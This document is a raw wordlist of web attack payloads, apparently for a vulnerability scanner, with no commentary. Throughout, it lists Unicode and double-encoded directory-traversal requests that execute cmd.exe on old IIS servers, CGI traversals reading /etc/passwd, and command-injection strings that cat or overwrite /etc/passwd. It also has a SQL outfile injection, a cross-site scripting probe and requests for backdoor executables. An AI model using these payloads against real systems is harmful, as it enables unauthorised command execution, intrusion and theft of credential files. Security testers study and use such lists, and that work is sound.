%2352_dsmm
%23720505qazsjroha
%23bbs-118-jh
%23fdao$fdsfd
%23nbaamlq
%5FhKJH%40%24%5Fhgsd123%40%5F%24f
***
../web-inf
./admin
./web-inf
?m=a
?pageservices
?s=d
?wp-html-rend
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:
_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
_vti_bin/shtml.dll/_vti_rpc
_vti_cnf/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
_vti_cnf/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
~
~adm
~administrator
~bin
~cgi
~cgi-bin
~cgi-win
~dat
~data
~database
~dev
~etc
~ftp
~guest
~home
~htaccess
~html
~htpasswd
~ibill
~lancelot
~log
~logs
~lp
~mnt
~named
~nobody
~nobody/etc
~ofs
~oracle
~passwd
~passwrd
~pre
~root
~sbin
~stats
~sys~
~temp
~test
~tmp
~usr
~uucp
~var
+
<script>alert('can+cross+site+attack')</script>
bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
bin/scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
bin/scripts/......../winnt/system32/cmd.exe?/c+dir
bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir
bugzilla/long_list.cgi?buglist=1%20into%20outfile%20%27/tmp/pussycat%27
c/cmd.exe?/c+dir
c/root.exe?/c+dir
c:
cache-stats
ccc.exe?/c+dir
cgi-bin
cgi-bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
cgi-bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
cgi-bin/admin/admin
cgi-bin/adp
cgi-bin/aglimpse
cgi-bin/allmanage/adp
cgi-bin/allmanage/k
cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../etc/passwd
cgi-bin/anyform
cgi-bin/anyform2
cgi-bin/archie
cgi-bin/ash
cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
cgi-bin/authorize/dbmfiles/users
cgi-bin/bash
cgi-bin/bb-hostsvc.sh?hostsvc=/../../../../../../../../etc/passwd
cgi-bin/bbs
cgi-bin/bnbform
cgi-bin/board/db
cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95010642/winnt/cmd.exe?/c+dir
cgi-bin/c32web.exe/checkerror?error=53
cgi-bin/c32web.exe/showadmindir
cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00
cgi-bin/calendar
cgi-bin/campas
cgi-bin/carbodll
cgi-bin/cart32.exe/error
cgi-bin/ccc.exe?/c+dir
cgi-bin/ceilidh.exe/ceilidh/?n4
cgi-bin/cgiforum.pl?thesection=../../../../../../etc/passwd%00
cgi-bin/cgiwrap
cgi-bin/cgiwrap/%3cs%3e
cgi-bin/classifieds
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd32.exe?/c+dir
cgi-bin/counterfiglet
cgi-bin/counterfiglet/nc/f
cgi-bin/csh
cgi-bin/date
cgi-bin/day5notifier
cgi-bin/db2www/library/document.d2w/show
cgi-bin/dcforum/dcboard.cgi?az=list&file=/etc/passwd%00
cgi-bin/directorypro.cgi?want=showcat&show=../../../..etc/passwd%00
cgi-bin/dnewsweb
cgi-bin/empower?db=ukrteamhole
cgi-bin/excite
cgi-bin/faxsurvey
cgi-bin/filemail
cgi-bin/finger
cgi-bin/flexform
cgi-bin/formmail
cgi-bin/fortune
cgi-bin/glimpse
cgi-bin/guestbook
cgi-bin/gw5
cgi-bin/handler
cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
cgi-bin/htgrep
cgibin/htgrep/file=index.html&hdr=/etc/passwd
cgi-bin/htgrep/file=index.html&hdr=/etc/passwd
cgi-bin/htmlscript
cgi-bin/htmlscript?../../../../etc/passwd
cgi-bin/htsearch
cgi-bin/htsearch?-c/etc/passwd
cgi-bin/htsearch?config=aaa
cgi-bin/info2www
cgi-bin/jj
cgi-bin/k
cgi-bin/ksh
cgi-bin/lascns
cgi-bin/lavsan
cgi-bin/machineinfo
cgi-bin/mail
cgi-bin/megvie
cgi-bin/ncommerce3/execmacro/macro.d2w/noexistinghtmlblock
cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd
cgi-bin/netstat
cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd
cgi-bin/nph-publish
cgi-bin/nph-test-cgi
cgi-bin/pals-cgi
cgi-bin/pals-cgi?palsaction=restart&documentname=/etc/passwd
cgi-bin/passwd
cgi-bin/password
cgi-bin/perl
cgi-bin/pfdisplay
cgi-bin/phf
cgi-bin/php
cgi-bin/phpscan
cgi-bin/pi?page=document/show_file&id=aaaaaaaaaa
cgi-bin/plusmail
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/bin/ls%00
cgi-bin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd%00
cgi-bin/post-query
cgi-bin/printenv
cgi-bin/query
cgi-bin/redirect
cgi-bin/responder
cgi-bin/rksh
cgi-bin/root.exe?/c+dir
cgi-bin/rpm_query
cgi-bin/rsh
cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
cgi-bin/search.pl?form=/etc/passwd%00
cgi-bin/search/hsx.cgi?show=../../../../../../../etc/passwd%00
cgi-bin/sh
cgi-bin/shop.cgi/page=../../../../../../etc/passwd
cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd
cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%cartid%&file=;cat%20/etc/passwd|
cgi-bin/sojourn
cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00
cgi-bin/ssi
cgi-bin/ssi../../../../../../../../../etc/passwd
cgi-bin/survey
cgi-bin/talkback.cgi?article=.../../../../../../../../etc/passwd%00&action=view&matchview=1
cgi-bin/tcsh
cgi-bin/testcgi
cgi-bin/test-cgi
cgi-bin/test-cgi/*
cgi-bin/test-cgi?*
cgi-bin/test-env
cgi-bin/tpgnrock
cgi-bin/ttawebtop.cgi/?action=start&pg=
cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
cgi-bin/udirectory.pl?main_field=blah&command=add_new_listing&category_file=/../../../../../../../bin/id
cgi-bin/uptime
cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/passwd
cgi-bin/view-source
cgi-bin/w3-msql
cgi-bin/w3-sql
cgi-bin/w3tvarspm
cgi-bin/web_store/web_store.cgi?page=../../../../../../../etc/passwd%00ext
cgi-bin/webdriver
cgi-bin/webgais
cgi-bin/webplus
cgi-bin/webplus?script=/../../../../etc/passwd
cgi-bin/websendmail
cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
cgi-bin/wrap
cgi-bin/www-sql
cgi-bin/yabb.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00
cgi-bin/zsh
cmd.exe?/c+dir
cmd.exe?/c+dir%20c:
cmd1.exe?/c+dir
d/root.exe?/c+dir
etc/passwd|mail
examplesweb-inf
exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
homepage.nsf/$defaultnav
http1.0
index%252easp
index%252ejsp
index%2easp
index%2ejsp
index.jsp%3f
index.jsp/%3f
index.php
index.php?file=../../../../../../etc/passwd
index.php?file=/etc/passwd
index.php?page=../../../../etc/passwd
level/42/exec/show%20conf
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
members-only
msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
msadc/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
msadc/root.exe?/c+dir
names.nsf/open
nph-test-cgi
opendir.php?requesturl=/etc/passwd
opt/netscape/suitespot/admin-serv/config/admpw
pals-cgi
pals-cgi?palsaction=restart&documentname=/bin/id
photoads/cgi-bin
phplib/page.php?_phplib[libdir]=http:www.china.com
phpmyadmin/sql.php?btndrop=no&goto=/etc/passwd
phprocketaddin/?page=../../../../etc/passwd
prd.i/pgen
publisher/|publisher
samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/*
scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:
scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/c32web.exe/changeadminpassword
scripts/cart32.exe/cart32clientlist
scripts/ccc.exe?/c+dir
scripts/cmd.exe?/c+dir
scripts/cmd1.exe?+/c+dir
scripts/cmd32.exe?/c+dir
scripts/command.exe?+/c+dir
scripts/eeyehack.exe?+/c+dir
scripts/hack.exe?/c+dir
scripts/i.exe?/c+dir
scripts/iisadmin/ism.dll?dir/bdir+??c:
scripts/iisadmin/ism.dll?http/dir
scripts/nph-publish
scripts/nph-test-cgi
scripts/root.exe?/c+dir
scripts/sensepost.exe?+/c+dir
scripts/srx.exe?+/c+dir
scripts/view-source
scripts/w3-msql
scripts/www-sql
search.dll?search?query=/&logic=and
server%+logfile
server+logfile
server-info
server-status
squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
technote/main.cgi/oops
userreg.cgi?cmd=insert</=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
userreg.cgi?cmd=insert>/etc/passwd
viewpage.php?file=/etc/passwd
web-inf
webstart+log
www-sql
wz520%23